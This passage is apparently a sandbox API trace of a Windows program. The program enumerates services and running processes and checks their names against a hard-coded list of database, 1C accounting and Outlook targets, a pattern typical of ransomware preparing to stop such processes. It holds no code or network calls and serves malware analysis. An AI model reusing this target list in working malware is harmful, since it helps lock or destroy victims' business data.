lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0048.746] CloseHandle (hObject=0x1b4) returned 1 [0048.746] Sleep (dwMilliseconds=0x1f4) [0049.460] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e50 [0049.485] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0049.486] GetLastError () returned 0xea [0049.486] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0049.486] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0049.487] CloseServiceHandle (hSCObject=0x4232e50) returned 1 [0049.487] lstrlenW (lpString="Appinfo") returned 7 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0049.487] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0049.487] lstrlenW (lpString="AudioSrv") returned 8 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0049.487] lstrlenW (lpString="BFE") returned 3 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0049.487] lstrlenW (lpString="CryptSvc") returned 8 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0049.488] lstrlenW (lpString="CscService") returned 10 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0049.488] lstrlenW (lpString="DcomLaunch") returned 10 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0049.488] lstrlenW (lpString="Dhcp") returned 4 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0049.488] lstrlenW (lpString="Dnscache") returned 8 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0049.488] lstrlenW (lpString="DPS") returned 3 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0049.488] lstrlenW (lpString="eventlog") returned 8 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0049.489] lstrlenW (lpString="EventSystem") returned 11 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0049.489] lstrlenW (lpString="gpsvc") returned 5 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0049.489] lstrlenW (lpString="iphlpsvc") returned 8 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0049.489] lstrlenW (lpString="LanmanServer") returned 12 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0049.489] lstrlenW (lpString="LanmanWorkstation") returned 17 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0049.489] lstrlenW (lpString="lmhosts") returned 7 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0049.490] lstrlenW (lpString="MMCSS") returned 5 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0049.490] lstrlenW (lpString="MpsSvc") returned 6 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0049.490] lstrlenW (lpString="Netman") returned 6 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0049.490] lstrlenW (lpString="netprofm") returned 8 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0049.490] lstrlenW (lpString="NlaSvc") returned 6 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0049.491] lstrlenW (lpString="nsi") returned 3 [0049.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0049.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0049.491] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0049.491] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0049.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0049.491] lstrlenW (lpString="PcaSvc") returned 6 [0049.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0049.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0049.491] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0049.491] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0049.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0049.491] lstrlenW (lpString="PlugPlay") returned 8 [0049.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0049.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0049.491] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0049.491] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0049.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0049.491] lstrlenW (lpString="Power") returned 5 [0049.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0049.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0049.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0049.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0049.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0049.491] lstrlenW (lpString="ProfSvc") returned 7 [0049.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0049.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0049.491] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0049.491] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0049.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0049.491] lstrlenW (lpString="RpcEptMapper") returned 12 [0049.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.491] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0049.492] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0049.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0049.492] lstrlenW (lpString="RpcSs") returned 5 [0049.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0049.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0049.492] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0049.492] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0049.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0049.492] lstrlenW (lpString="SamSs") returned 5 [0049.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0049.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0049.492] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0049.492] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0049.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0049.492] lstrlenW (lpString="Schedule") returned 8 [0049.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0049.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0049.492] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0049.492] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0049.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0049.492] lstrlenW (lpString="SENS") returned 4 [0049.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0049.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0049.492] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0049.492] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0049.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0049.492] lstrlenW (lpString="ShellHWDetection") returned 16 [0049.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.492] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0049.492] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0049.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0049.492] lstrlenW (lpString="Spooler") returned 7 [0049.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0049.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0049.493] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0049.493] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0049.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0049.493] lstrlenW (lpString="swprv") returned 5 [0049.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0049.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0049.493] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0049.493] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0049.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0049.493] lstrlenW (lpString="SysMain") returned 7 [0049.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0049.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0049.493] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0049.493] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0049.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0049.493] lstrlenW (lpString="Themes") returned 6 [0049.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0049.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0049.493] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0049.493] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0049.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0049.493] lstrlenW (lpString="TrkWks") returned 6 [0049.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0049.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0049.493] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0049.493] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0049.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0049.493] lstrlenW (lpString="UxSms") returned 5 [0049.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0049.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0049.493] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0049.493] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0049.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0049.493] lstrlenW (lpString="VSS") returned 3 [0049.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0049.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0049.494] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0049.494] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0049.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0049.494] lstrlenW (lpString="WdiServiceHost") returned 14 [0049.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0049.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0049.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0049.494] lstrlenW (lpString="WdiSystemHost") returned 13 [0049.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0049.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0049.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0049.494] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0049.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0049.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0049.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0049.494] lstrlenW (lpString="Winmgmt") returned 7 [0049.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0049.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0049.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0049.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0049.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0049.494] lstrlenW (lpString="WPDBusEnum") returned 10 [0049.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0049.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0049.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0049.495] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0049.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0049.499] Process32FirstW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.500] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.501] lstrlenW (lpString="System") returned 6 [0049.501] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0049.501] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0049.501] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0049.501] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0049.501] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0049.501] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0049.501] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0049.501] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.502] lstrlenW (lpString="smss.exe") returned 8 [0049.502] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0049.502] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0049.502] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0049.502] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0049.502] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0049.502] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0049.502] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0049.502] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.503] lstrlenW (lpString="csrss.exe") returned 9 [0049.503] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0049.503] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0049.503] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0049.503] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0049.503] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0049.503] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0049.503] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0049.503] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.504] lstrlenW (lpString="wininit.exe") returned 11 [0049.504] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0049.504] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0049.504] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0049.504] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, 